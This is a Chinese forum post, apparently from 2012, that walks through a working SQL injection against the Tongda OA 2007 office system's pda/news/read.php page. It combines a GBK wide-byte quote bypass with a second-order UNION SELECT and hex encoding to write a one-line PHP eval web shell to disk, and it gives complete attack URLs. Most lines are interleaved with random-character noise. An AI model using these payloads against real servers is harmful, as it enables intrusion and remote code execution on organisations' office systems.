目前测试通达OA2007版本
' i: e1 s) ?1 D5 a+ @' V1 K- C1 d7 v0 [3 m5 H
, m# g' [+ G" e$ Y& Y' N) i3 b
Office Anywhere 2007 网络智能办公系统 ~, P' T% X" x$ x' w) z j
/ {) P, \# c, R! f1 j1 t+ S
http://127.0.0.1/pda/news/read.php?P=%cf' 猪点。 暴web目录..
: [& ]- y9 f. P* V ; g; s. l2 Q. g: P& r8 Z) x- @, A
3 X4 s7 L+ G3 B: p* T: |
这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的9 k0 N. e0 i* r0 M+ Q& a
8 Y0 Y% @: a G* T例如:SELECT * from USER where USER_ID='{$USERNAME}' 7 J! U2 Y: y" o- i9 \
其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了2 @* I- Y4 A8 y. p! ?- d
% ]; R8 a* H3 v" J8 j
这个时候我们是不是可以组合起来使用哪?
; B) X7 c* f* b E2 i: r
; S) y) j% L. `/ t. h e: ]# V第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样( s& T0 Y, Q7 b. a0 b- I& x% G
union select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10
; i7 x( H, X6 B1 |; X' H
( I! P+ s+ d: z4 o4 j6 f这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了
+ a0 j4 H; L3 X- U0 x! [
/ J8 P9 V& |( i- S8 f3 a" Q( P w那么问题来了,单引号可以吗?当然是不可以的,^_^。。。
# N6 b5 n/ V3 c* ]! U
' f' |9 O+ W# n- }, [) R) j那么我们用字符串格式带入进行hex编码
1 h2 S3 D5 R1 n6 f& D5 Q7 W 0 s$ U# K8 A0 R& M" [
%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
, g8 j' a: `1 H
6 H X5 Z' k6 ?. U+ V2 W a测试ok,获取oa的webshell
' b; I! s$ _. S) t" |# q
0 }& Q; b. g; |1 }0 Z, [0 q' P
5 H' \( b7 d( L6 j8 Q5 _pda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
9 F6 f2 p3 B, j9 r+ |0 V& C直接getwebshell |
发表于 2012-12-20 08:09:24
收藏
支持
反对